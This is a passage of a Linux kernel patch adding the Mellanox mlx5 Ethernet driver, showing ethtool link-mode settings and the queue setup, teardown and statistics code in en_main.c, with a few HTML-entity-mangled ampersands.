mlx5e_ethtool2ptys_adver_link(cmd->advertising) : + mlx5e_ethtool2ptys_speed_link(speed); + + err = mlx5_query_port_proto_cap(mdev, ð_proto_cap, MLX5_PTYS_EN); + if (err) { + netdev_err(netdev, "%s: query port eth proto cap failed: %d\n", + __func__, err); + goto out; + } + + link_modes = link_modes & eth_proto_cap; + if (!link_modes) { + netdev_err(netdev, "%s: Not supported link mode(s) requested", + __func__); + err = -EINVAL; + goto out; + } + + err = mlx5_query_port_proto_admin(mdev, ð_proto_admin, MLX5_PTYS_EN); + if (err) { + netdev_err(netdev, "%s: query port eth proto admin failed: %d\n", + __func__, err); + goto out; + } + + if (link_modes == eth_proto_admin) + goto out; + + err = mlx5_set_port_proto(mdev, link_modes, MLX5_PTYS_EN); + if (err) { + netdev_err(netdev, "%s: set port eth proto admin failed: %d\n", + __func__, err); + goto out; + } + + err = mlx5_query_port_status(mdev, &port_status); + if (err) + goto out; + + if (port_status == MLX5_PORT_DOWN) + return 0; + + err = mlx5_set_port_status(mdev, MLX5_PORT_DOWN); + if (err) + goto out; + err = mlx5_set_port_status(mdev, MLX5_PORT_UP); +out: + return err; +} + +const struct ethtool_ops mlx5e_ethtool_ops = { + .get_drvinfo = mlx5e_get_drvinfo, + .get_link = ethtool_op_get_link, + .get_strings = mlx5e_get_strings, + .get_sset_count = mlx5e_get_sset_count, + .get_ethtool_stats = mlx5e_get_ethtool_stats, + .get_ringparam = mlx5e_get_ringparam, + .set_ringparam = mlx5e_set_ringparam, + .get_channels = mlx5e_get_channels, + .set_channels = mlx5e_set_channels, + .get_coalesce = mlx5e_get_coalesce, + .set_coalesce = mlx5e_set_coalesce, + .get_settings = mlx5e_get_settings, + .set_settings = mlx5e_set_settings, +}; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c new file mode 100644 index 000000000000..eee829d119f9 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c @@ -0,0 +1,1899 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include "en.h" + +struct mlx5e_rq_param { + u32 rqc[MLX5_ST_SZ_DW(rqc)]; + struct mlx5_wq_param wq; +}; + +struct mlx5e_sq_param { + u32 sqc[MLX5_ST_SZ_DW(sqc)]; + struct mlx5_wq_param wq; +}; + +struct mlx5e_cq_param { + u32 cqc[MLX5_ST_SZ_DW(cqc)]; + struct mlx5_wq_param wq; + u16 eq_ix; +}; + +struct mlx5e_channel_param { + struct mlx5e_rq_param rq; + struct mlx5e_sq_param sq; + struct mlx5e_cq_param rx_cq; + struct mlx5e_cq_param tx_cq; +}; + +static void mlx5e_update_carrier(struct mlx5e_priv *priv) +{ + struct mlx5_core_dev *mdev = priv->mdev; + u8 port_state; + + port_state = mlx5_query_vport_state(mdev, + MLX5_QUERY_VPORT_STATE_IN_OP_MOD_VNIC_VPORT); + + if (port_state == VPORT_STATE_UP) + netif_carrier_on(priv->netdev); + else + netif_carrier_off(priv->netdev); +} + +static void mlx5e_update_carrier_work(struct work_struct *work) +{ + struct mlx5e_priv *priv = container_of(work, struct mlx5e_priv, + update_carrier_work); + + mutex_lock(&priv->state_lock); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_update_carrier(priv); + mutex_unlock(&priv->state_lock); +} + +void mlx5e_update_stats(struct mlx5e_priv *priv) +{ + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5e_vport_stats *s = &priv->stats.vport; + struct mlx5e_rq_stats *rq_stats; + struct mlx5e_sq_stats *sq_stats; + u32 in[MLX5_ST_SZ_DW(query_vport_counter_in)]; + u32 *out; + int outlen = MLX5_ST_SZ_BYTES(query_vport_counter_out); + u64 tx_offload_none; + int i, j; + + out = mlx5_vzalloc(outlen); + if (!out) + return; + + /* Collect firts the SW counters and then HW for consistency */ + s->tso_packets = 0; + s->tso_bytes = 0; + s->tx_queue_stopped = 0; + s->tx_queue_wake = 0; + s->tx_queue_dropped = 0; + tx_offload_none = 0; + s->lro_packets = 0; + s->lro_bytes = 0; + s->rx_csum_none = 0; + s->rx_wqe_err = 0; + for (i = 0; i < priv->params.num_channels; i++) { + rq_stats = &priv->channel[i]->rq.stats; + + s->lro_packets += rq_stats->lro_packets; + s->lro_bytes += rq_stats->lro_bytes; + s->rx_csum_none += rq_stats->csum_none; + s->rx_wqe_err += rq_stats->wqe_err; + + for (j = 0; j < priv->num_tc; j++) { + sq_stats = &priv->channel[i]->sq[j].stats; + + s->tso_packets += sq_stats->tso_packets; + s->tso_bytes += sq_stats->tso_bytes; + s->tx_queue_stopped += sq_stats->stopped; + s->tx_queue_wake += sq_stats->wake; + s->tx_queue_dropped += sq_stats->dropped; + tx_offload_none += sq_stats->csum_offload_none; + } + } + + /* HW counters */ + memset(in, 0, sizeof(in)); + + MLX5_SET(query_vport_counter_in, in, opcode, + MLX5_CMD_OP_QUERY_VPORT_COUNTER); + MLX5_SET(query_vport_counter_in, in, op_mod, 0); + MLX5_SET(query_vport_counter_in, in, other_vport, 0); + + memset(out, 0, outlen); + + if (mlx5_cmd_exec(mdev, in, sizeof(in), out, outlen)) + goto free_out; + +#define MLX5_GET_CTR(p, x) \ + MLX5_GET64(query_vport_counter_out, p, x) + + s->rx_error_packets = + MLX5_GET_CTR(out, received_errors.packets); + s->rx_error_bytes = + MLX5_GET_CTR(out, received_errors.octets); + s->tx_error_packets = + MLX5_GET_CTR(out, transmit_errors.packets); + s->tx_error_bytes = + MLX5_GET_CTR(out, transmit_errors.octets); + + s->rx_unicast_packets = + MLX5_GET_CTR(out, received_eth_unicast.packets); + s->rx_unicast_bytes = + MLX5_GET_CTR(out, received_eth_unicast.octets); + s->tx_unicast_packets = + MLX5_GET_CTR(out, transmitted_eth_unicast.packets); + s->tx_unicast_bytes = + MLX5_GET_CTR(out, transmitted_eth_unicast.octets); + + s->rx_multicast_packets = + MLX5_GET_CTR(out, received_eth_multicast.packets); + s->rx_multicast_bytes = + MLX5_GET_CTR(out, received_eth_multicast.octets); + s->tx_multicast_packets = + MLX5_GET_CTR(out, transmitted_eth_multicast.packets); + s->tx_multicast_bytes = + MLX5_GET_CTR(out, transmitted_eth_multicast.octets); + + s->rx_broadcast_packets = + MLX5_GET_CTR(out, received_eth_broadcast.packets); + s->rx_broadcast_bytes = + MLX5_GET_CTR(out, received_eth_broadcast.octets); + s->tx_broadcast_packets = + MLX5_GET_CTR(out, transmitted_eth_broadcast.packets); + s->tx_broadcast_bytes = + MLX5_GET_CTR(out, transmitted_eth_broadcast.octets); + + s->rx_packets = + s->rx_unicast_packets + + s->rx_multicast_packets + + s->rx_broadcast_packets; + s->rx_bytes = + s->rx_unicast_bytes + + s->rx_multicast_bytes + + s->rx_broadcast_bytes; + s->tx_packets = + s->tx_unicast_packets + + s->tx_multicast_packets + + s->tx_broadcast_packets; + s->tx_bytes = + s->tx_unicast_bytes + + s->tx_multicast_bytes + + s->tx_broadcast_bytes; + + /* Update calculated offload counters */ + s->tx_csum_offload = s->tx_packets - tx_offload_none; + s->rx_csum_good = s->rx_packets - s->rx_csum_none; + +free_out: + kvfree(out); +} + +static void mlx5e_update_stats_work(struct work_struct *work) +{ + struct delayed_work *dwork = to_delayed_work(work); + struct mlx5e_priv *priv = container_of(dwork, struct mlx5e_priv, + update_stats_work); + mutex_lock(&priv->state_lock); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) { + mlx5e_update_stats(priv); + schedule_delayed_work(dwork, + msecs_to_jiffies( + MLX5E_UPDATE_STATS_INTERVAL)); + } + mutex_unlock(&priv->state_lock); +} + +static void __mlx5e_async_event(struct mlx5e_priv *priv, + enum mlx5_dev_event event) +{ + switch (event) { + case MLX5_DEV_EVENT_PORT_UP: + case MLX5_DEV_EVENT_PORT_DOWN: + schedule_work(&priv->update_carrier_work); + break; + + default: + break; + } +} + +static void mlx5e_async_event(struct mlx5_core_dev *mdev, void *vpriv, + enum mlx5_dev_event event, unsigned long param) +{ + struct mlx5e_priv *priv = vpriv; + + spin_lock(&priv->async_events_spinlock); + if (test_bit(MLX5E_STATE_ASYNC_EVENTS_ENABLE, &priv->state)) + __mlx5e_async_event(priv, event); + spin_unlock(&priv->async_events_spinlock); +} + +static void mlx5e_enable_async_events(struct mlx5e_priv *priv) +{ + set_bit(MLX5E_STATE_ASYNC_EVENTS_ENABLE, &priv->state); +} + +static void mlx5e_disable_async_events(struct mlx5e_priv *priv) +{ + spin_lock_irq(&priv->async_events_spinlock); + clear_bit(MLX5E_STATE_ASYNC_EVENTS_ENABLE, &priv->state); + spin_unlock_irq(&priv->async_events_spinlock); +} + +static void mlx5e_send_nop(struct mlx5e_sq *sq) +{ + struct mlx5_wq_cyc *wq = &sq->wq; + + u16 pi = sq->pc & wq->sz_m1; + struct mlx5e_tx_wqe *wqe = mlx5_wq_cyc_get_wqe(wq, pi); + + struct mlx5_wqe_ctrl_seg *cseg = &wqe->ctrl; + + memset(cseg, 0, sizeof(*cseg)); + + cseg->opmod_idx_opcode = cpu_to_be32((sq->pc << 8) | MLX5_OPCODE_NOP); + cseg->qpn_ds = cpu_to_be32((sq->sqn << 8) | 0x01); + cseg->fm_ce_se = MLX5_WQE_CTRL_CQ_UPDATE; + + sq->skb[pi] = NULL; + sq->pc++; + mlx5e_tx_notify_hw(sq, wqe); +} + +static int mlx5e_create_rq(struct mlx5e_channel *c, + struct mlx5e_rq_param *param, + struct mlx5e_rq *rq) +{ + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + void *rqc = param->rqc; + void *rqc_wq = MLX5_ADDR_OF(rqc, rqc, wq); + int wq_sz; + int err; + int i; + + err = mlx5_wq_ll_create(mdev, ¶m->wq, rqc_wq, &rq->wq, + &rq->wq_ctrl); + if (err) + return err; + + rq->wq.db = &rq->wq.db[MLX5_RCV_DBR]; + + wq_sz = mlx5_wq_ll_get_size(&rq->wq); + rq->skb = kzalloc_node(wq_sz * sizeof(*rq->skb), GFP_KERNEL, + cpu_to_node(c->cpu)); + if (!rq->skb) { + err = -ENOMEM; + goto err_rq_wq_destroy; + } + + rq->wqe_sz = (priv->params.lro_en) ? priv->params.lro_wqe_sz : + priv->netdev->mtu + ETH_HLEN + VLAN_HLEN; + + for (i = 0; i < wq_sz; i++) { + struct mlx5e_rx_wqe *wqe = mlx5_wq_ll_get_wqe(&rq->wq, i); + + wqe->data.lkey = c->mkey_be; + wqe->data.byte_count = cpu_to_be32(rq->wqe_sz); + } + + rq->pdev = c->pdev; + rq->netdev = c->netdev; + rq->channel = c; + rq->ix = c->ix; + + return 0; + +err_rq_wq_destroy: + mlx5_wq_destroy(&rq->wq_ctrl); + + return err; +} + +static void mlx5e_destroy_rq(struct mlx5e_rq *rq) +{ + kfree(rq->skb); + mlx5_wq_destroy(&rq->wq_ctrl); +} + +static int mlx5e_enable_rq(struct mlx5e_rq *rq, struct mlx5e_rq_param *param) +{ + struct mlx5e_channel *c = rq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *in; + void *rqc; + void *wq; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(create_rq_in) + + sizeof(u64) * rq->wq_ctrl.buf.npages; + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + rqc = MLX5_ADDR_OF(create_rq_in, in, ctx); + wq = MLX5_ADDR_OF(rqc, rqc, wq); + + memcpy(rqc, param->rqc, sizeof(param->rqc)); + + MLX5_SET(rqc, rqc, cqn, c->rq.cq.mcq.cqn); + MLX5_SET(rqc, rqc, state, MLX5_RQC_STATE_RST); + MLX5_SET(rqc, rqc, flush_in_error_en, 1); + MLX5_SET(wq, wq, wq_type, MLX5_WQ_TYPE_LINKED_LIST); + MLX5_SET(wq, wq, log_wq_pg_sz, rq->wq_ctrl.buf.page_shift - + PAGE_SHIFT); + MLX5_SET64(wq, wq, dbr_addr, rq->wq_ctrl.db.dma); + + mlx5_fill_page_array(&rq->wq_ctrl.buf, + (__be64 *)MLX5_ADDR_OF(wq, wq, pas)); + + err = mlx5_create_rq(mdev, in, inlen, &rq->rqn); + + kvfree(in); + + return err; +} + +static int mlx5e_modify_rq(struct mlx5e_rq *rq, int curr_state, int next_state) +{ + struct mlx5e_channel *c = rq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *in; + void *rqc; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(modify_rq_in); + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + rqc = MLX5_ADDR_OF(modify_rq_in, in, ctx); + + MLX5_SET(modify_rq_in, in, rq_state, curr_state); + MLX5_SET(rqc, rqc, state, next_state); + + err = mlx5_modify_rq(mdev, rq->rqn, in, inlen); + + kvfree(in); + + return err; +} + +static void mlx5e_disable_rq(struct mlx5e_rq *rq) +{ + struct mlx5e_channel *c = rq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + mlx5_destroy_rq(mdev, rq->rqn); +} + +static int mlx5e_wait_for_min_rx_wqes(struct mlx5e_rq *rq) +{ + struct mlx5e_channel *c = rq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_wq_ll *wq = &rq->wq; + int i; + + for (i = 0; i < 1000; i++) { + if (wq->cur_sz >= priv->params.min_rx_wqes) + return 0; + + msleep(20); + } + + return -ETIMEDOUT; +} + +static int mlx5e_open_rq(struct mlx5e_channel *c, + struct mlx5e_rq_param *param, + struct mlx5e_rq *rq) +{ + int err; + + err = mlx5e_create_rq(c, param, rq); + if (err) + return err; + + err = mlx5e_enable_rq(rq, param); + if (err) + goto err_destroy_rq; + + err = mlx5e_modify_rq(rq, MLX5_RQC_STATE_RST, MLX5_RQC_STATE_RDY); + if (err) + goto err_disable_rq; + + set_bit(MLX5E_RQ_STATE_POST_WQES_ENABLE, &rq->state); + mlx5e_send_nop(&c->sq[0]); /* trigger mlx5e_post_rx_wqes() */ + + return 0; + +err_disable_rq: + mlx5e_disable_rq(rq); +err_destroy_rq: + mlx5e_destroy_rq(rq); + + return err; +} + +static void mlx5e_close_rq(struct mlx5e_rq *rq) +{ + clear_bit(MLX5E_RQ_STATE_POST_WQES_ENABLE, &rq->state); + napi_synchronize(&rq->channel->napi); /* prevent mlx5e_post_rx_wqes */ + + mlx5e_modify_rq(rq, MLX5_RQC_STATE_RDY, MLX5_RQC_STATE_ERR); + while (!mlx5_wq_ll_is_empty(&rq->wq)) + msleep(20); + + /* avoid destroying rq before mlx5e_poll_rx_cq() is done with it */ + napi_synchronize(&rq->channel->napi); + + mlx5e_disable_rq(rq); + mlx5e_destroy_rq(rq); +} + +static void mlx5e_free_sq_db(struct mlx5e_sq *sq) +{ + kfree(sq->dma_fifo); + kfree(sq->skb); +} + +static int mlx5e_alloc_sq_db(struct mlx5e_sq *sq, int numa) +{ + int wq_sz = mlx5_wq_cyc_get_size(&sq->wq); + int df_sz = wq_sz * MLX5_SEND_WQEBB_NUM_DS; + + sq->skb = kzalloc_node(wq_sz * sizeof(*sq->skb), GFP_KERNEL, numa); + sq->dma_fifo = kzalloc_node(df_sz * sizeof(*sq->dma_fifo), GFP_KERNEL, + numa); + + if (!sq->skb || !sq->dma_fifo) { + mlx5e_free_sq_db(sq); + return -ENOMEM; + } + + sq->dma_fifo_mask = df_sz - 1; + + return 0; +} + +static int mlx5e_create_sq(struct mlx5e_channel *c, + int tc, + struct mlx5e_sq_param *param, + struct mlx5e_sq *sq) +{ + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *sqc = param->sqc; + void *sqc_wq = MLX5_ADDR_OF(sqc, sqc, wq); + int err; + + err = mlx5_alloc_map_uar(mdev, &sq->uar); + if (err) + return err; + + err = mlx5_wq_cyc_create(mdev, ¶m->wq, sqc_wq, &sq->wq, + &sq->wq_ctrl); + if (err) + goto err_unmap_free_uar; + + sq->wq.db = &sq->wq.db[MLX5_SND_DBR]; + sq->uar_map = sq->uar.map; + sq->bf_buf_size = (1 << MLX5_CAP_GEN(mdev, log_bf_reg_size)) / 2; + + if (mlx5e_alloc_sq_db(sq, cpu_to_node(c->cpu))) + goto err_sq_wq_destroy; + + sq->txq = netdev_get_tx_queue(priv->netdev, + c->ix + tc * priv->params.num_channels); + + sq->pdev = c->pdev; + sq->mkey_be = c->mkey_be; + sq->channel = c; + sq->tc = tc; + + return 0; + +err_sq_wq_destroy: + mlx5_wq_destroy(&sq->wq_ctrl); + +err_unmap_free_uar: + mlx5_unmap_free_uar(mdev, &sq->uar); + + return err; +} + +static void mlx5e_destroy_sq(struct mlx5e_sq *sq) +{ + struct mlx5e_channel *c = sq->channel; + struct mlx5e_priv *priv = c->priv; + + mlx5e_free_sq_db(sq); + mlx5_wq_destroy(&sq->wq_ctrl); + mlx5_unmap_free_uar(priv->mdev, &sq->uar); +} + +static int mlx5e_enable_sq(struct mlx5e_sq *sq, struct mlx5e_sq_param *param) +{ + struct mlx5e_channel *c = sq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *in; + void *sqc; + void *wq; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(create_sq_in) + + sizeof(u64) * sq->wq_ctrl.buf.npages; + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + sqc = MLX5_ADDR_OF(create_sq_in, in, ctx); + wq = MLX5_ADDR_OF(sqc, sqc, wq); + + memcpy(sqc, param->sqc, sizeof(param->sqc)); + + MLX5_SET(sqc, sqc, user_index, sq->tc); + MLX5_SET(sqc, sqc, tis_num_0, priv->tisn[sq->tc]); + MLX5_SET(sqc, sqc, cqn, c->sq[sq->tc].cq.mcq.cqn); + MLX5_SET(sqc, sqc, state, MLX5_SQC_STATE_RST); + MLX5_SET(sqc, sqc, tis_lst_sz, 1); + MLX5_SET(sqc, sqc, flush_in_error_en, 1); + + MLX5_SET(wq, wq, wq_type, MLX5_WQ_TYPE_CYCLIC); + MLX5_SET(wq, wq, uar_page, sq->uar.index); + MLX5_SET(wq, wq, log_wq_pg_sz, sq->wq_ctrl.buf.page_shift - + PAGE_SHIFT); + MLX5_SET64(wq, wq, dbr_addr, sq->wq_ctrl.db.dma); + + mlx5_fill_page_array(&sq->wq_ctrl.buf, + (__be64 *)MLX5_ADDR_OF(wq, wq, pas)); + + err = mlx5_create_sq(mdev, in, inlen, &sq->sqn); + + kvfree(in); + + return err; +} + +static int mlx5e_modify_sq(struct mlx5e_sq *sq, int curr_state, int next_state) +{ + struct mlx5e_channel *c = sq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *in; + void *sqc; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(modify_sq_in); + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + sqc = MLX5_ADDR_OF(modify_sq_in, in, ctx); + + MLX5_SET(modify_sq_in, in, sq_state, curr_state); + MLX5_SET(sqc, sqc, state, next_state); + + err = mlx5_modify_sq(mdev, sq->sqn, in, inlen); + + kvfree(in); + + return err; +} + +static void mlx5e_disable_sq(struct mlx5e_sq *sq) +{ + struct mlx5e_channel *c = sq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + mlx5_destroy_sq(mdev, sq->sqn); +} + +static int mlx5e_open_sq(struct mlx5e_channel *c, + int tc, + struct mlx5e_sq_param *param, + struct mlx5e_sq *sq) +{ + int err; + + err = mlx5e_create_sq(c, tc, param, sq); + if (err) + return err; + + err = mlx5e_enable_sq(sq, param); + if (err) + goto err_destroy_sq; + + err = mlx5e_modify_sq(sq, MLX5_SQC_STATE_RST, MLX5_SQC_STATE_RDY); + if (err) + goto err_disable_sq; + + set_bit(MLX5E_SQ_STATE_WAKE_TXQ_ENABLE, &sq->state); + netdev_tx_reset_queue(sq->txq); + netif_tx_start_queue(sq->txq); + + return 0; + +err_disable_sq: + mlx5e_disable_sq(sq); +err_destroy_sq: + mlx5e_destroy_sq(sq); + + return err; +} + +static inline void netif_tx_disable_queue(struct netdev_queue *txq) +{ + __netif_tx_lock_bh(txq); + netif_tx_stop_queue(txq); + __netif_tx_unlock_bh(txq); +} + +static void mlx5e_close_sq(struct mlx5e_sq *sq) +{ + clear_bit(MLX5E_SQ_STATE_WAKE_TXQ_ENABLE, &sq->state); + napi_synchronize(&sq->channel->napi); /* prevent netif_tx_wake_queue */ + netif_tx_disable_queue(sq->txq); + + /* ensure hw is notified of all pending wqes */ + if (mlx5e_sq_has_room_for(sq, 1)) + mlx5e_send_nop(sq); + + mlx5e_modify_sq(sq, MLX5_SQC_STATE_RDY, MLX5_SQC_STATE_ERR); + while (sq->cc != sq->pc) /* wait till sq is empty */ + msleep(20); + + /* avoid destroying sq before mlx5e_poll_tx_cq() is done with it */ + napi_synchronize(&sq->channel->napi); + + mlx5e_disable_sq(sq); + mlx5e_destroy_sq(sq); +} + +static int mlx5e_create_cq(struct mlx5e_channel *c, + struct mlx5e_cq_param *param, + struct mlx5e_cq *cq) +{ + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5_core_cq *mcq = &cq->mcq; + int eqn_not_used; + int irqn; + int err; + u32 i; + + param->wq.numa = cpu_to_node(c->cpu); + param->eq_ix = c->ix; + + err = mlx5_cqwq_create(mdev, ¶m->wq, param->cqc, &cq->wq, + &cq->wq_ctrl); + if (err) + return err; + + mlx5_vector2eqn(mdev, param->eq_ix, &eqn_not_used, &irqn); + + cq->napi = &c->napi; + + mcq->cqe_sz = 64; + mcq->set_ci_db = cq->wq_ctrl.db.db; + mcq->arm_db = cq->wq_ctrl.db.db + 1; + *mcq->set_ci_db = 0; + *mcq->arm_db = 0; + mcq->vector = param->eq_ix; + mcq->comp = mlx5e_completion_event; + mcq->event = mlx5e_cq_error_event; + mcq->irqn = irqn; + mcq->uar = &priv->cq_uar; + + for (i = 0; i < mlx5_cqwq_get_size(&cq->wq); i++) { + struct mlx5_cqe64 *cqe = mlx5_cqwq_get_wqe(&cq->wq, i); + + cqe->op_own = 0xf1; + } + + cq->channel = c; + + return 0; +} + +static void mlx5e_destroy_cq(struct mlx5e_cq *cq) +{ + mlx5_wq_destroy(&cq->wq_ctrl); +} + +static int mlx5e_enable_cq(struct mlx5e_cq *cq, struct mlx5e_cq_param *param) +{ + struct mlx5e_channel *c = cq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5_core_cq *mcq = &cq->mcq; + + void *in; + void *cqc; + int inlen; + int irqn_not_used; + int eqn; + int err; + + inlen = MLX5_ST_SZ_BYTES(create_cq_in) + + sizeof(u64) * cq->wq_ctrl.buf.npages; + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + cqc = MLX5_ADDR_OF(create_cq_in, in, cq_context); + + memcpy(cqc, param->cqc, sizeof(param->cqc)); + + mlx5_fill_page_array(&cq->wq_ctrl.buf, + (__be64 *)MLX5_ADDR_OF(create_cq_in, in, pas)); + + mlx5_vector2eqn(mdev, param->eq_ix, &eqn, &irqn_not_used); + + MLX5_SET(cqc, cqc, c_eqn, eqn); + MLX5_SET(cqc, cqc, uar_page, mcq->uar->index); + MLX5_SET(cqc, cqc, log_page_size, cq->wq_ctrl.buf.page_shift - + PAGE_SHIFT); + MLX5_SET64(cqc, cqc, dbr_addr, cq->wq_ctrl.db.dma); + + err = mlx5_core_create_cq(mdev, mcq, in, inlen); + + kvfree(in); + + if (err) + return err; + + mlx5e_cq_arm(cq); + + return 0; +} + +static void mlx5e_disable_cq(struct mlx5e_cq *cq) +{ + struct mlx5e_channel *c = cq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + mlx5_core_destroy_cq(mdev, &cq->mcq); +} + +static int mlx5e_open_cq(struct mlx5e_channel *c, + struct mlx5e_cq_param *param, + struct mlx5e_cq *cq, + u16 moderation_usecs, + u16 moderation_frames) +{ + int err; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + err = mlx5e_create_cq(c, param, cq); + if (err) + return err; + + err = mlx5e_enable_cq(cq, param); + if (err) + goto err_destroy_cq; + + err = mlx5_core_modify_cq_moderation(mdev, &cq->mcq, + moderation_usecs, + moderation_frames); + if (err) + goto err_destroy_cq; + + return 0; + +err_destroy_cq: + mlx5e_destroy_cq(cq); + + return err; +} + +static void mlx5e_close_cq(struct mlx5e_cq *cq) +{ + mlx5e_disable_cq(cq); + mlx5e_destroy_cq(cq); +} + +static int mlx5e_get_cpu(struct mlx5e_priv *priv, int ix) +{ + return cpumask_first(priv->mdev->priv.irq_info[ix].mask); +} + +static int mlx5e_open_tx_cqs(struct mlx5e_channel *c, + struct mlx5e_channel_param *cparam) +{ + struct mlx5e_priv *priv = c->priv; + int err; + int tc; + + for (tc = 0; tc < c->num_tc; tc++) { + err = mlx5e_open_cq(c, &cparam->tx_cq, &c->sq[tc].cq, + priv->params.tx_cq_moderation_usec, + priv->params.tx_cq_moderation_pkts); + if (err) + goto err_close_tx_cqs; + + c->sq[tc].cq.sqrq = &c->sq[tc]; + } + + return 0; + +err_close_tx_cqs: + for (tc--; tc >= 0; tc--) + mlx5e_close_cq(&c->sq[tc].cq); + + return err; +} + +static void mlx5e_close_tx_cqs(struct mlx5e_channel *c) +{ + int tc; + + for (tc = 0; tc < c->num_tc; tc++) + mlx5e_close_cq(&c->sq[tc].cq); +} + +static int mlx5e_open_sqs(struct mlx5e_channel *c, + struct mlx5e_channel_param *cparam) +{ + int err; + int tc; + + for (tc = 0; tc < c->num_tc; tc++) { + err = mlx5e_open_sq(c, tc, &cparam->sq, &c->sq[tc]); + if (err) + goto err_close_sqs; + } + + return 0; + +err_close_sqs: + for (tc--; tc >= 0; tc--) + mlx5e_close_sq(&c->sq[tc]); + + return err; +} + +static void mlx5e_close_sqs(struct mlx5e_channel *c) +{ + int tc; + + for (tc = 0; tc < c->num_tc; tc++) + mlx5e_close_sq(&c->sq[tc]); +} + +static int mlx5e_open_channel(struct mlx5e_priv *priv, int ix, + struct mlx5e_channel_param *cparam, + struct mlx5e_channel **cp) +{ + struct net_device *netdev = priv->netdev; + int cpu = mlx5e_get_cpu(priv, ix); + struct mlx5e_channel *c; + int err; + + c = kzalloc_node(sizeof(*c), GFP_KERNEL, cpu_to_node(cpu)); + if (!c) + return -ENOMEM; + + c->priv = priv; + c->ix = ix; + c->cpu = cpu; + c->pdev = &priv->mdev->pdev->dev; + c->netdev = priv->netdev; + c->mkey_be = cpu_to_be32(priv->mr.key); + c->num_tc = priv->num_tc; + + netif_napi_add(netdev, &c->napi, mlx5e_napi_poll, 64); + + err = mlx5e_open_tx_cqs(c, cparam); + if (err) + goto err_napi_del; + + err = mlx5e_open_cq(c, &cparam->rx_cq, &c->rq.cq, + priv->params.rx_cq_moderation_usec, + priv->params.rx_cq_moderation_pkts); + if (err) + goto err_close_tx_cqs; + c->rq.cq.sqrq = &c->rq; + + napi_enable(&c->napi); + + err = mlx5e_open_sqs(c, cparam); + if (err) + goto err_disable_napi; + + err = mlx5e_open_rq(c, &cparam->rq, &c->rq); + if (err) + goto err_close_sqs; + + netif_set_xps_queue(netdev, get_cpu_mask(c->cpu), ix); + *cp = c; + + return 0; + +err_close_sqs: + mlx5e_close_sqs(c); + +err_disable_napi: + napi_disable(&c->napi); + mlx5e_close_cq(&c->rq.cq); + +err_close_tx_cqs: + mlx5e_close_tx_cqs(c); + +err_napi_del: + netif_napi_del(&c->napi); + kfree(c); + + return err; +} + +static void mlx5e_close_channel(struct mlx5e_channel *c) +{ + mlx5e_close_rq(&c->rq); + mlx5e_close_sqs(c); + napi_disable(&c->napi); + mlx5e_close_cq(&c->rq.cq); + mlx5e_close_tx_cqs(c); + netif_napi_del(&c->napi); + kfree(c); +} + +static void mlx5e_build_rq_param(struct mlx5e_priv *priv, + struct mlx5e_rq_param *param) +{ + void *rqc = param->rqc; + void *wq = MLX5_ADDR_OF(rqc, rqc, wq); + + MLX5_SET(wq, wq, wq_type, MLX5_WQ_TYPE_LINKED_LIST); + MLX5_SET(wq, wq, end_padding_mode, MLX5_WQ_END_PAD_MODE_ALIGN); + MLX5_SET(wq, wq, log_wq_stride, ilog2(sizeof(struct mlx5e_rx_wqe))); + MLX5_SET(wq, wq, log_wq_sz, priv->params.log_rq_size); + MLX5_SET(wq, wq, pd, priv->pdn); + + param->wq.numa = 